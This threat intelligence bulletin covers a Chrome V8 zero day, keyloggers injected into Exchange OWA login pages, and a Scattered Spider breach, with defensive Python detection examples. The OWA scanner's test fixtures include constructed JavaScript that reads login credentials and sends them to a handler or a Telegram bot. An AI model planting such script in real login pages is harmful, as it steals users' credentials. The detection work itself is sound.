
NormCyber Threat Bulletin: 03rd July 2025

Chrome’s V8 Zero Day: A Critical Vulnerability Actively Exploited

Written by Matthew Johnson, Threat Intelligence Analyst

On 30 June 2025 Google released an emergency stable-channel update for a zero day in its Chrome browser. Tracked as CVE‑2025‑6554, the vulnerability is a type confusion bug in V8, Chrome's JavaScript and WebAssembly engine. A crafted HTML page can trigger it to obtain an arbitrary memory read/write primitive in the renderer process, which is the usual starting point for code execution. Because V8 runs inside Chrome's sandboxed renderer rather than the main browser process, a full compromise of the host typically also needs a sandbox escape, but the bug alone is enough to give an attacker a foothold from a single page visit. Google confirmed that an exploit exists in the wild, so this is an actively exploited zero day that warrants immediate attention.

The vulnerability was discovered by Clément Lecigne of Google's Threat Analysis Group and reported on 25 June 2025. The next day, 26 June, Google pushed a configuration change to the stable channel across all platforms to blunt exploitation while a proper fix was built. That stop-gap was followed by the fixed builds: Chrome 138.0.7204.96/.97 for Windows, 138.0.7204.92/.93 for macOS and 138.0.7204.96 for Linux. Google advises updating to the latest release as soon as possible. Note that Chrome downloads updates in the background but only applies them on relaunch, so a fleet that has "updated" without restarting the browser is still running the vulnerable build.
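
As an added example (not from Google's advisory or from the bulletin's sources), the following Python turns the fixed build numbers above into a fleet check. It parses `chrome --version` style strings for each host and compares the four-part version as integers, because a plain string comparison would rank a later build such as 138.0.7204.100 below 138.0.7204.96. The inventory lines, the hostnames and the 138.0.7204.100 build are constructed for illustration.

```python
"""Fleet check for CVE-2025-6554: which hosts run a Chrome build older than
the first fixed build for their platform? Added example, not Google's code."""
import re

# First fixed build per platform, from the Chrome stable channel update
# (Windows 138.0.7204.96/.97, macOS 138.0.7204.92/.93, Linux 138.0.7204.96).
FIXED_BUILDS = {
    "windows": (138, 0, 7204, 96),
    "macos": (138, 0, 7204, 92),
    "linux": (138, 0, 7204, 96),
}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple:
    """Pull a four-part Chrome version out of text such as
    'Google Chrome 138.0.7204.92' and return it as a tuple of ints."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no Chrome version found in {text!r}")
    return tuple(int(part) for part in m.groups())


def is_patched(version_text: str, platform: str) -> bool:
    """True if the build is at or above the first fixed build for its platform.
    Comparing int tuples matters: as strings, '138.0.7204.100' < '138.0.7204.96'."""
    return parse_version(version_text) >= FIXED_BUILDS[platform.lower()]


# Constructed inventory: hostname, platform, `chrome --version` output.
# ws-05 carries a hypothetical later build to show the numeric comparison.
INVENTORY = [
    "ws-01,windows,Google Chrome 138.0.7204.97",
    "ws-02,windows,Google Chrome 137.0.7151.120",
    "mac-03,macos,Google Chrome 138.0.7204.92",
    "srv-04,linux,Google Chrome 138.0.7204.49",
    "ws-05,windows,Google Chrome 138.0.7204.100",
]


def find_unpatched(inventory) -> list:
    """Return the hostnames still on a vulnerable build."""
    unpatched = []
    for line in inventory:
        host, platform, version_text = line.split(",", 2)
        if not is_patched(version_text, platform):
            unpatched.append(host)
    return unpatched


if __name__ == "__main__":
    print("Still vulnerable:", find_unpatched(INVENTORY))
```

The version string is what the browser reports after a relaunch; a host that has downloaded the update but not restarted Chrome will still report the old build, which is exactly the case this check is meant to surface.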

CVE‑2025‑6554 is the fourth Chrome zero day exploited in the wild during 2025, after CVE‑2025‑2783, CVE‑2025‑4664 and CVE‑2025‑5419. The pattern reflects the browser's position as both the primary user interface to the web and the most widely exposed attack surface on an endpoint.

This run of browser zero days underlines the importance of defences at the browser layer: keeping Chrome (and other Chromium-based browsers, which inherit V8 and its bugs) on a short update cycle, and treating an unpatched browser as an exposed service. Criminal and nation state groups exploit browser flaws for espionage, credential theft and targeted surveillance, and a type confusion in V8 is reachable from any web page the target can be induced to open.

Google's handling of this case also shows a response model that is faster than the traditional patch cycle: a configuration change deployed to the stable channel within a day of the report, followed by emergency builds within the week. Organisations should mirror that cadence on their side by monitoring the Chrome release feed and pushing browser updates out of band rather than waiting for the next scheduled patch window.

References:
Chrome Zero-Day CVE-2025-6554 Under Active Attack — Google Issues Security Update
NVD – CVE-2025-6554
Chrome Releases: Stable Channel Update for Desktop

Keylogger Malware Targeting Microsoft Exchange Servers

Written by Matthew Johnson, Threat Intelligence Analyst

A global campaign documented by security firm Positive Technologies has seen unidentified threat actors compromise over 70 publicly accessible Microsoft Exchange servers and inject JavaScript keyloggers into their Outlook Web Access (OWA) login pages. Two variants were observed: one writes harvested credentials to a file on the server that is reachable from the internet, while the other transmits them to an attacker-controlled channel as soon as the user submits the login form.

The attack chains involved exploiting known security flaws within Microsoft Exchange Server to insert the keylogger code into the login pages, including the vulnerabilities listed below:

  • CVE-2014-4078 – IIS Security Feature Bypass Vulnerability
  • CVE-2020-0796 – Windows SMBv3 Client/Server Remote Code Execution Vulnerability
  • CVE-2021-31206 – Microsoft Exchange Server Remote Code Execution Vulnerability
  • CVE-2021-31207 (Security Feature Bypass), CVE-2021-34473 (Remote Code Execution) and CVE-2021-34523 (Elevation of Privilege) – the ProxyShell chain
  • CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerabilities (the ProxyLogon chain)

The keylogger hides inside the legitimate login form. It runs in the browser of whoever signs in, reads the username and password fields at submit time and hands them off via XMLHttpRequest calls, either to the compromised server for storage or out to the attacker. The file-storing variant generates no outbound traffic at all, and in the transmitting variant the requests originate from the victim's endpoint rather than from the Exchange server, so egress monitoring on the server itself sees nothing unusual and the theft goes unnoticed.

The ongoing campaign spans at least 65 compromised servers across 26 countries, with confirmed incidents at government organisations, IT firms, industrial operators, logistics providers and educational institutions in countries including Australia, the Netherlands, China and Turkey.

The attackers use two exfiltration techniques. In the first, credentials are written to a file on the compromised server that stays accessible from the internet, so the attacker simply fetches it later over HTTP. In the second, the data is sent immediately, either to a Telegram bot with the stolen values passed in encoded headers, or through DNS tunnelling combined with HTTPS POST requests. Both are designed to blend into traffic that looks legitimate and so evade conventional detection.
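
Both variants can be hunted for on the server itself. The Python below is an added example, not Positive Technologies' tooling: it pulls the inline script blocks out of a saved copy of the OWA logon page, scores each block against indicators drawn from the behaviour described above (reading the username and password inputs, hooking form submission, XMLHttpRequest/fetch, the Telegram bot API, encoding of the payload), and also offers a baseline hash comparison that catches modifications the heuristics miss. The sample pages, the injected snippets, the /owa/auth/_tmp.ashx handler path and the logon page location are all constructed or assumed, not taken from the report.

```python
"""Heuristic scan of an OWA logon page for injected JavaScript credential
stealers. Added example, not Positive Technologies' tooling."""
import hashlib
import re

# Assumed location of the page on an Exchange 2013+ front end (not from the
# report); the scanner itself only needs the page text.
OWA_LOGON_PATH = r"%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\logon.aspx"

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

# (name, pattern, weight): behaviours a login-page keylogger needs or tends to use.
INDICATORS = [
    ("reads_password_field", re.compile(r"getElementById\(\s*['\"](password|passwd|pwd)['\"]", re.I), 3),
    ("reads_username_field", re.compile(r"getElementById\(\s*['\"](username|user|login)['\"]", re.I), 1),
    ("hooks_form_submit",    re.compile(r"\.onsubmit\s*=|addEventListener\(\s*['\"]submit['\"]", re.I), 2),
    ("xhr_or_fetch",         re.compile(r"XMLHttpRequest|\bfetch\(", re.I), 2),
    ("telegram_bot_api",     re.compile(r"api\.telegram\.org/bot", re.I), 5),
    ("external_url",         re.compile(r"https?://[a-z0-9.-]+", re.I), 1),
    ("encodes_payload",      re.compile(r"\bbtoa\(|encodeURIComponent\(", re.I), 1),
]


def scan_logon_page(html: str, threshold: int = 6) -> list:
    """Score every inline <script> block; report those at or above threshold.
    A benign logon page has no script that both reads the password field and
    sends it somewhere, so the weights make that pairing decisive."""
    findings = []
    for index, body in enumerate(SCRIPT_RE.findall(html)):
        matched = [name for name, pattern, _ in INDICATORS if pattern.search(body)]
        score = sum(weight for name, _, weight in INDICATORS if name in matched)
        if score >= threshold:
            findings.append({"script_index": index, "score": score,
                             "indicators": matched, "snippet": body.strip()[:72]})
    return findings


def page_sha256(html: str) -> str:
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def matches_baseline(html: str, baseline_sha256: str) -> bool:
    """Integrity check against a hash recorded right after patching. Drift
    means the page changed, whether or not the heuristics above fire."""
    return page_sha256(html) == baseline_sha256


# Constructed logon page with a harmless inline script.
CLEAN_PAGE = """<html><body>
<form id="logonForm" action="/owa/auth.owa" method="post">
<input id="username" name="username"><input id="password" name="password" type="password">
</form>
<script>
function clkLgn() { document.cookie = "PBack=0; path=/"; return true; }
</script></body></html>"""

# Constructed variant 1: hand credentials to a same-origin handler (hypothetical
# path) so server-side code can write them to a web-reachable file.
INJECT_FILE_VARIANT = """<script>
document.getElementById("logonForm").addEventListener("submit", function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("password").value;
  var x = new XMLHttpRequest();
  x.open("POST", "/owa/auth/_tmp.ashx", false);
  x.send(encodeURIComponent(u + ":" + p));
});
</script>"""

# Constructed variant 2: send credentials straight to a Telegram bot.
INJECT_TELEGRAM_VARIANT = """<script>
document.getElementById("logonForm").onsubmit = function () {
  var d = btoa(document.getElementById("username").value + "|" +
               document.getElementById("password").value);
  var x = new XMLHttpRequest();
  x.open("GET", "https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=<ID>&text=" + d, true);
  x.send();
};
</script>"""

TAMPERED_FILE = CLEAN_PAGE.replace("</body>", INJECT_FILE_VARIANT + "</body>")
TAMPERED_TELEGRAM = CLEAN_PAGE.replace("</body>", INJECT_TELEGRAM_VARIANT + "</body>")

if __name__ == "__main__":
    baseline = page_sha256(CLEAN_PAGE)
    for label, page in [("clean", CLEAN_PAGE), ("file", TAMPERED_FILE), ("telegram", TAMPERED_TELEGRAM)]:
        state = "baseline ok" if matches_baseline(page, baseline) else "MODIFIED"
        print(label, state, scan_logon_page(page))
```

The baseline hash is the stronger control: record it after every Exchange update, alert on any change, and use the heuristic scan to triage what changed. A script block that reads the password field and talks to the network is worth a manual look even if its score falls short of the threshold.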

This campaign highlights the enduring risk of exposed Exchange infrastructure. By leveraging vulnerabilities that are years old and embedding keyloggers in the legitimate login interface, the attackers found a quiet but effective way of harvesting credentials from high-value targets. Two practical consequences follow: patching an Exchange server today does not undo an injection performed through a flaw exploited earlier, so the OWA login page should be checked for unexpected script and the server treated as compromised if any is found; and because the exfiltration channels avoid the server's own egress, a web-accessible file under the OWA path or an unexplained change to the login page is a better indicator than network alerts.

References:
Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers
Exchange mutations. Malicious code in Outlook pages

Scattered Spider Targets CFO Account in Four Day Scorched Earth Breach

Written by Matthew Johnson, Threat Intelligence Analyst

Scattered Spider members have recently breached an unnamed organisation by targeting its chief financial officer and using the executive’s privileged access to conduct a “scorched earth” attack. According to research published by ReliaQuest, the threat actor group performed a four day long attack against the organisation in May 2025, beginning with obtaining the CFO’s credentials.

The attack chain began with the threat actors obtaining the CFO's credentials for the organisation's public-facing Oracle Cloud single sign-on (SSO) portal. How Scattered Spider obtained them is not known, but the group has previously used credential harvesters on typosquatted domains and social engineering.

On Day 1 the group made multiple attempts to log in to the CFO's Oracle Cloud portal from 159[.]148[.]131[.]196, all of which failed because MFA was enforced. On Day 2 they contacted the organisation's IT help desk posing as the CFO and had the account's MFA and credentials reset, which succeeded. With the account in hand, the attackers enumerated Entra ID to identify privileged accounts and searched SharePoint for sensitive files. They also extended the intrusion to the organisation's VMware Horizon virtual desktop infrastructure.

On Day 3 Scattered Spider accessed critical database applications, including the organisation's Snowflake instances. Having compromised Entra ID service principals (the identities applications use to access Azure resources) on the previous day, the attackers assigned the Global Administrator role to one of them, giving themselves tenant-wide control through a non-human identity that is easy to overlook. They also hampered the incident response team by tampering with team members' inboxes, including intercepting urgent messages about the incident.

On Day 4, ReliaQuest describes a tug of war between the IR team and the threat actors over control of the Global Administrator role. It ended only when Microsoft intervened and restored control of the Entra ID tenant to the victim organisation.
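
Two of the moves above leave distinctive traces in Entra ID logs: a privileged directory role being granted to a service principal (Day 3), and an MFA re-registration on an account that had just failed MFA challenges from a single IP, followed by a successful sign-in from that same IP (Days 1 and 2). The Python below is an added example, not ReliaQuest's detection content; it runs those two rules over constructed newline-delimited JSON records. The field names approximate the Entra ID audit and sign-in log schemas (activityDisplayName, targetResources, "Add member to role", "Admin registered security info") and are assumptions; the source IP is the one named in the report, while the dates, account names and service principal name are made up.

```python
"""Two detection rules over simplified Entra ID audit and sign-in records,
mirroring the help-desk MFA reset and the Global Administrator grant to a
service principal described above. Added example, not ReliaQuest's content."""
import json
from datetime import datetime, timedelta

# Constructed audit records (NDJSON). Field names approximate the Entra ID
# audit log schema (an assumption); values are invented apart from role names.
AUDIT_LOG = """
{"time":"2025-05-05T10:40:00Z","activityDisplayName":"Admin registered security info","initiatedBy":"helpdesk@example.com","targetResources":[{"type":"User","displayName":"cfo@example.com"}],"role":null}
{"time":"2025-05-06T09:12:00Z","activityDisplayName":"Add member to role","initiatedBy":"cfo@example.com","targetResources":[{"type":"ServicePrincipal","displayName":"billing-sync"}],"role":"Global Administrator"}
{"time":"2025-05-06T09:15:00Z","activityDisplayName":"Add member to role","initiatedBy":"admin@example.com","targetResources":[{"type":"User","displayName":"j.doe@example.com"}],"role":"Helpdesk Administrator"}
"""

# Constructed sign-in records. The source IP is the one named in the report;
# the timestamps and accounts are invented.
SIGNIN_LOG = """
{"time":"2025-05-04T14:01:00Z","user":"cfo@example.com","ip":"159.148.131.196","status":"failure","reason":"MFA required"}
{"time":"2025-05-04T14:03:00Z","user":"cfo@example.com","ip":"159.148.131.196","status":"failure","reason":"MFA required"}
{"time":"2025-05-04T16:30:00Z","user":"cfo@example.com","ip":"203.0.113.7","status":"success","reason":""}
{"time":"2025-05-05T11:02:00Z","user":"cfo@example.com","ip":"159.148.131.196","status":"success","reason":""}
"""

PRIVILEGED_ROLES = {"Global Administrator", "Privileged Role Administrator",
                    "Privileged Authentication Administrator"}


def load_ndjson(text: str) -> list:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def privileged_role_to_service_principal(audit: list) -> list:
    """Rule 1: a privileged directory role added to a non-human identity.
    Applications almost never need Global Administrator, and that grant was
    the attackers' persistence step on Day 3."""
    hits = []
    for rec in audit:
        if rec.get("activityDisplayName") != "Add member to role":
            continue
        if rec.get("role") not in PRIVILEGED_ROLES:
            continue
        for target in rec.get("targetResources", []):
            if target.get("type") == "ServicePrincipal":
                hits.append({"time": rec["time"], "role": rec["role"],
                             "principal": target["displayName"],
                             "initiated_by": rec["initiatedBy"]})
    return hits


def mfa_reset_after_failed_challenges(audit: list, signins: list,
                                      window: timedelta = timedelta(hours=48)) -> list:
    """Rule 2: an admin re-registers MFA for a user who, within `window`
    before the reset, failed MFA from some IP, and that same IP then signs in
    successfully after the reset. Day 1 and Day 2 of the intrusion in one query."""
    hits = []
    for rec in audit:
        if rec.get("activityDisplayName") != "Admin registered security info":
            continue
        reset_at = parse_time(rec["time"])
        for target in rec.get("targetResources", []):
            user = target.get("displayName")
            failed_ips = {s["ip"] for s in signins
                          if s["user"] == user and s["status"] == "failure"
                          and reset_at - window <= parse_time(s["time"]) <= reset_at}
            later_ok_ips = {s["ip"] for s in signins
                            if s["user"] == user and s["status"] == "success"
                            and parse_time(s["time"]) > reset_at}
            for ip in sorted(failed_ips & later_ok_ips):
                hits.append({"user": user, "ip": ip, "reset_time": rec["time"],
                             "reset_by": rec["initiatedBy"]})
    return hits


if __name__ == "__main__":
    audit, signins = load_ndjson(AUDIT_LOG), load_ndjson(SIGNIN_LOG)
    for hit in privileged_role_to_service_principal(audit):
        print("PRIVILEGED ROLE -> SERVICE PRINCIPAL:", hit)
    for hit in mfa_reset_after_failed_challenges(audit, signins):
        print("MFA RESET AFTER FAILED CHALLENGES:", hit)
```

Rule 1 is low-volume enough to page on directly. Rule 2 will also fire on a genuine user who lost a phone and then signed in from a new network, so it is better suited to a high-priority help desk review than to automatic lockout; the discriminator in this case was that the IP requesting the reset had already been failing MFA for a day.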

According to the report, Scattered Spider accelerated its activity once it knew it had been discovered and adopted a "scorched-earth approach" to cause maximum disruption. Notably, despite the length of the intrusion and the group's track record, no ransomware was deployed before the attackers were fully evicted.

References:
Scattered Spider Taps CFO Account in ‘Scorched Earth’ Breach
Scattered Spider Targets Tech Companies for Help-Desk Exploitation – ReliaQuest
